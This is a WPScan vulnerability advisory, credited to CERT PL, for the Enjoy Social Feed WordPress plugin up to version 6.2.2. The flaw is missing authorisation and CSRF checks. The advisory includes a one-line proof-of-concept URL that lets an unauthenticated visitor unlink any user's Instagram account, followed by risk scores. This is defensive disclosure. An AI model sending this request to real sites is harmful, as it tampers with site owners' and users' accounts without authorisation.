Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:CED134CF-82C5-401B-9476-B6456E1924E2
HistoryFeb 20, 2024 - 12:00 a.m.

Enjoy Social Feed <= 6.2.2 - Unauthenticated Arbitrary Instagram Account Unlinking

2024-02-2000:00:00
Krzysztof Zając (CERT PL)
wpscan.com
8
unauthenticated access
csrf vulnerability
instagram account unlinking
arbitrary user
plugin vulnerability

6.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example

PoC

As unauthenticated, open the following URL to unlink the Instagram account of the user with ID 5: https://example.com/wp-admin/admin-post.php?action=enjoyinstagram-remove-user&amp;user;_id=5&amp;tab;=users-settings

6.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Related for WPVDB-ID:CED134CF-82C5-401B-9476-B6456E1924E2